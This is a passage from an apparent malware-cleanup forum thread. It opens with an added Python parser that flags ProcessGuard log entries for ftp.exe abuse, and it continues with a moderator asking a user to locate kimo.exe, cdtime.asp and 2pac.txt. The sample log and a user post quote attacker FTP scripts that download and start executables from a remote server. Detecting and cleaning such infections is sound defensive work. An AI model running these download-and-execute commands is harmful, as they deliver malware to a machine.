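The ProcessGuard entries above are what the moderator reads to spot the abuse of ftp.exe. As an added example (not from this thread, and not ProcessGuard's own tooling), here is a small Python parser for that three-line log layout together with the checks a defender would run over it: ftp.exe launched with a -s: script file, cmd.exe spawned by lsass.exe, an FTP script assembled inline with echo, and a parent reported as "Unknown Process". The sample log is constructed to mirror the posted layout; the server address is a documentation-range placeholder, the PIDs are arbitrary, and one command line is wrapped onto a second line the way it is in the log above, so the parser has to rejoin it.

```python
import re
from collections import namedtuple

# Sample ProcessGuard entries in the three-line layout of the logs posted in this
# thread. Constructed for this example: the server IP is a documentation-range
# placeholder, PIDs are arbitrary, and one Commandline is wrapped on purpose.
SAMPLE_LOG = """\
---Process Guard Log Started---
Thu 04 - 17:47:09 [EXECUTION] "c:\\windows\\system32\\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\\windows\\system32\\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\\windows\\system32\\wuauclt.exe" /runstoreascomserver local\\[2a4]susds0000 ]
Thu 04 - 17:50:34 [EXECUTION] "c:\\windows\\system32\\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\\windows\\system32\\lsass.exe" [488]
[EXECUTION] Commandline - [ cmd ]
Thu 04 - 17:50:45 [EXECUTION] "c:\\windows\\system32\\ftp.exe" was blocked from running
[EXECUTION] Started by "c:\\windows\\system32\\cmd.exe" [1708]
[EXECUTION] Commandline - [ ftp.exe -n -s:cdtime.asp ]
Thu 04 - 17:50:45 [EXECUTION] "c:\\windows\\system32\\cmd.exe" was allowed to run
[EXECUTION] Started by "c:\\windows\\system32\\lsass.exe" [488]
[EXECUTION] Commandline - [ cmd /c echo open 192.0.2.10 58739 >cdtime.asp &cmd /c echo binary >>cdtime.asp &cmd /c echo get kimo.exe >>cdtime.asp &cmd /c ftp.exe -n -s:cdtime.asp &cmd /c del cdtime.asp &start kimo.exe
]
Thu 04 - 17:50:48 [EXECUTION] "c:\\windows\\system32\\ftp.exe" was blocked from running
[EXECUTION] Started by "Unknown Process" [1844]
[EXECUTION] Commandline - [ ftp.exe -n -s:cdtime.asp ]
"""

HEADER = re.compile(r'^(?P<stamp>\w{3} \d{2} - \d{2}:\d{2}:\d{2}) \[EXECUTION\] '
                    r'"(?P<image>[^"]+)" was (?P<verdict>allowed to run|blocked from running)$')
PARENT = re.compile(r'^\[EXECUTION\] Started by "(?P<parent>[^"]+)" \[(?P<ppid>\d+)\]$')
CMDLINE = re.compile(r'^\[EXECUTION\] Commandline - \[ (?P<cmd>.*) \]$')
SYSTEM_PARENTS = ("lsass.exe", "winlogon.exe", "csrss.exe")   # should never spawn a shell
FTP_SCRIPT = re.compile(r'\bftp(\.exe)?\b.*-s:', re.I)           # ftp driven by a script file
INLINE_SCRIPT = re.compile(r'echo\s+open\s+\S+.*>', re.I)        # script built with echo ... >file

Record = namedtuple("Record", "stamp image verdict parent ppid cmd")

def parse_log(text):
    """Turn ProcessGuard's three-line EXECUTION entries into Record tuples."""
    lines, records, i = text.splitlines(), [], 0
    while i + 2 < len(lines):
        h = HEADER.match(lines[i])
        if not h:                  # skip banners such as "---Process Guard Log Started---"
            i += 1
            continue
        p, cmd_line, i = PARENT.match(lines[i + 1]), lines[i + 2], i + 3
        # A long command line may be wrapped, leaving the closing "]" on a later line.
        while not cmd_line.rstrip().endswith("]") and i < len(lines):
            cmd_line, i = cmd_line + " " + lines[i].strip(), i + 1
        c = CMDLINE.match(cmd_line)
        if p and c:
            records.append(Record(h["stamp"], h["image"].lower(), h["verdict"],
                                  p["parent"].lower(), int(p["ppid"]), c["cmd"]))
    return records

def basename(path):
    return path.rsplit("\\", 1)[-1]

def find_suspicious(records):
    """Flag the behaviours the moderator picked out of the posted logs."""
    hits = []
    for r in records:
        img, par = basename(r.image), basename(r.parent)
        if img == "ftp.exe" and FTP_SCRIPT.search(r.cmd):
            hits.append((r, "ftp.exe driven by a script file (-s:)"))
        if img == "cmd.exe" and par in SYSTEM_PARENTS:
            hits.append((r, f"shell spawned by system process {par}"))
        if INLINE_SCRIPT.search(r.cmd):
            hits.append((r, "FTP download script written inline with echo"))
        if r.parent == "unknown process":
            hits.append((r, "parent process not visible to ProcessGuard"))
    return hits

def ftp_script_targets(records):
    """Recover server and requested files from inline-built FTP scripts: what a
    defender needs to block at the firewall and to hunt for on disk."""
    targets = []
    for r in records:
        m = re.search(r'echo\s+open\s+(\S+)(?:\s+(\d+))?', r.cmd, re.I)
        if m:
            files = re.findall(r'echo\s+get\s+(\S+)', r.cmd, re.I)
            targets.append((m.group(1), int(m.group(2) or 21), files))
    return targets

if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for rec, why in find_suspicious(recs):
        print(f"{rec.stamp}  {basename(rec.image)} <- {basename(rec.parent)}: {why}")
    for host, port, files in ftp_script_targets(recs):
        print(f"FTP server {host}:{port}, files requested: {', '.join(files)}")
```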

#100
Metallica

    Spyware Veteran

  • GeekU Moderator
  • 33,101 posts
Can you look for these files please:

cdtime.asp
mpdrv.dbx
kimo.exe
bla.txt
2pac.txt


Let me know which ones you find and where.

Regards,
  • 0


#101
duglartis

    Member

  • Topic Starter
  • Member
  • 159 posts
Hello, found 2:
kimo.exe-01a0130c.pfc
2pac.txt in c:\windows\system32
  • 0

#102
duglartis

    Member

  • Topic Starter
  • Member
  • 159 posts
Whoops, forgot to add:
kimo.exe-01a0130c.pfc in c:\windows\prefetch
  • 0

#103
Metallica

    Spyware Veteran

  • GeekU Moderator
  • 33,101 posts
OK. The file in the prefetch folder can be deleted; it is useless to us.
Can you open
c:\windows\system32\2pac.txt
and post what's inside?

Regards,
  • 0

#104
duglartis

    Member

  • Topic Starter
  • Member
  • 159 posts
Hello,
the details are:
open IP address removed by Metallica 10087
user [bleep] rulez
binary
get bingoo.exe
quit

cheers

Edited by Metallica, 04 August 2005 - 03:37 AM.

  • 0

#105
Metallica

    Spyware Veteran

  • GeekU Moderator
  • 33,101 posts
I found kimo.exe on the server your computer was hailing.

I'll see if I can get it removed.

I will remove the information from your last post after writing that down.

That looks like another link to a virus.

Can you see if bingoo.exe is present on your computer?

Regards,
  • 0